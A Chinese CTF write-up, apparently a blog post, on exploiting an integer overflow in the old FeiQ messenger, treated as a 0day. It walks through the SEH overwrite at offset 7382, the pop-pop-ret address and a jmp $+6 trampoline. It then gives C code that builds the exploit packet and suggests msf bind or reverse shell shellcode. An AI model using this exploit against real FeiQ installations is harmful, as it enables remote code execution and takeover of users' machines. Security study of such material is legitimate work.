190919 pwn-第五空间final_十生
说是题目,其实就是飞秋0day 233
之前虽然听说过各种windows的pwn
软件停止更新已久,保护都没开,是比较古老的玩意儿了
于是很容易搜到各种POC
例如0x49D03F
处的整形溢出
v54是输入进来的字符串,因此可以提供4294967295=0xffffffff=-1
从而使memcpy发生缓冲区溢出的异常,然后通过覆盖SEH的方式进行利用
通过cyclic
生成字符串填入,可以测出溢出点的偏移7382+4
然后在7382的位置填入ROP的地址
SEH的利用方式
因为异常处理handler的第二个参数esp+8
正好是异常结构的地址EstblisherFrame,即偏移7382
的位置
因此地址可以填充pop+pop+retn
的ROP,从而回到原栈
再在7382
的位置填充jmp $+6
即可跳过ROP地址,执行后面的shellcode
代码:
char *sendbuf;
sendbuf = (char *)GlobalAlloc(GMEM_ZEROINIT, 0x7fff);
char senddata1[] = "1_lbt4_1#65664#6CF04987CC1A#570#31741#4294967295#2.5a:1317316152:admin:XXCCLI-A10D5C26:0:";
int offset = 7382;
char befor_shellcode[] = "\xeb\x06\xeb\x06\x71\x15\xfa\x7f";//jmp $+6 and ROP_addr
int senddata1length = strlen(senddata1);strcpy(sendbuf, senddata1);
//strcpy(sendbuf + senddata1length, test_code);
memset(sendbuf + senddata1length, 'A', offset);
strcpy(sendbuf + senddata1length + offset, befor_shellcode);
strcpy(sendbuf + senddata1length + offset + strlen(befor_shellcode), shellcode);
shellcode本体可以由msf或者cs之类的直接生成bind_tcp
或reverse_tcp
的payload来获得shellcode
参考链接:
看雪poc
seh溢出
190919 pwn-第五空间final_十生相关推荐
- pwn暑假训练(十) emem这次的测验自己还是太菜
记一下昨天的测验我直接讲我没过的题目 有system函数没有'bin/sh'只开了nx但gadget少的可怜题目直接给了libc那就不用想了直接找偏移-我同学给的libc偏移不对- Gadgets i ...
- axure中备注线_琉璃:璇玑小本子上,别人名字都有备注唯独司凤没有,意义很浪漫...
<琉璃>是由成毅和袁冰妍主演的电视剧,作为一部仙侠剧,评分很高,整部电视剧并没有任何流量明星的加盟,全部都是"演技咖".在剧中成毅,袁冰妍的演技很出众,所饰演的司凤璇玑 ...
- 观物外篇-唐-邵雍:(一)
http://blog.sina.com.cn/s/blog_c187253f010192ri.html 观物外篇-唐-邵雍:(一) 观物外篇 (以<四库全书>本张行成<观物外篇衍义 ...
- 真正优秀的人,都过着朴素的生活
看过一个充满禅意的小故事: 一个小和尚问得道的师父:"您得道之前做什么?" 老和尚说:"砍柴.挑水.做饭." "那得道之后呢?"小和尚继续问 ...
- 数学符号发音及英文表达
α( 阿而法) β( 贝塔) γ(伽马) δ(德尔塔) ε(艾普西龙) ζ(截塔) η(艾塔) θ(西塔) ι约塔) κ(卡帕) λ(兰姆达) μ(米尤) ν(纽) ξ(可系) ο(奥密克戎) π ( ...
- 数学符号、希腊、拉丁字母、单位、标点的中英文读法
整理得很辛苦,若本文对你有帮助,请记得点赞.关注我呦! 我已尽量按标准字体输出这些符号,若有不符合该符号的写法或翻译,请在评论区留言. Α α a:lf 阿尔法 alpha 角度:系数 Β β bet ...
- [转]scite文本编辑器的说明
scite,也就是SCIntilla based Text Editor, 基于SCIntilla编辑组件的文本编辑器.我们见到的许多文本编辑器都是基于SCIntilla编辑组件的. yidabu.c ...
- 关于scite文本编辑器的说明
目录(?)[+] 关于scite文本编辑器的说明 text editor文本编辑器scite的配置文件类型 text editor文本编辑器scite用户配置例子 text editor文本编辑器sc ...
- scite的基本配置
SciTEGlobal.properties 全局配置文件,一般不去改动 SciTEUser.properties 用户配置文件,对全局配置要改动的地方,都写在这个文件里 SciTE.properti ...
最新文章
- zookeeper集群启动报错:Cannot open channel to * at election address /ip:3888
- python 写cs程序_Python cs.cmdutils包_程序模块 - PyPI - Python中文网
- BZOJ 2055: 80人环游世界 [上下界费用流]
- 22、UPDATE多表关联更新
- keil5详细的安装流程和设置
- npm查看指定包的所有版本
- 以下关于单模光纤的说法中,正确的是( )
- 实例学习SSIS(一)--制作一个简单的ETL包
- php中解析数组,在PHP中解析多维数组
- 一颗接一颗的飞鸽传书
- OpenStack —— DevStack配置安装
- 【图像融合】基于matlab curvelet变换图像融合【含Matlab源码 776期】
- 量子纠缠计算机里的灵魂意识,量子纠缠理论告诉我们,灵魂真的存在于你我身体?...
- Scheme协议详细介绍
- aid learning安装应用_Aid-Learning?在手机上免root运行VSCode?手机上实现多窗口?
- easyexcel一个很棒的Excel解析工具
- 基于人脸的常见表情识别(3)——模型搭建、训练与测试
- win10滑动关机代码bat_win10滑动关机代码bat_win10设置自动关机和取消自动关机的bat命令...
- 虹科案例 | 解决ASRS系统的痛点问题居然这么简单?(下)
- 游戏中的答题活动也可以通过远程代答么?
热门文章
- 常用频率与波长的对应关系以及ESUVHML的含义
- SoC中RDC的问题以及解决方法
- ZSS-25自动扫描射水高空水炮市场厂家分析参数数据
- vivo是安卓手机吗_vivo今年开发者大会不一样,原生万物,新OS即将起航|vivo|手机市场|智能手机|os|安卓...
- 服务器安装centOS7(以戴尔R730服务器为例)
- Thinkphp内核发卡系统源码/伯乐发卡源码
- cookie实现记住密码
- Zookeeper系列(二)、核心原理
- 这样设计一个可扩展、通用的、健壮性组件
- 量产矿用便携甲烷报警仪 此产品为煤矿用便携甲烷报警仪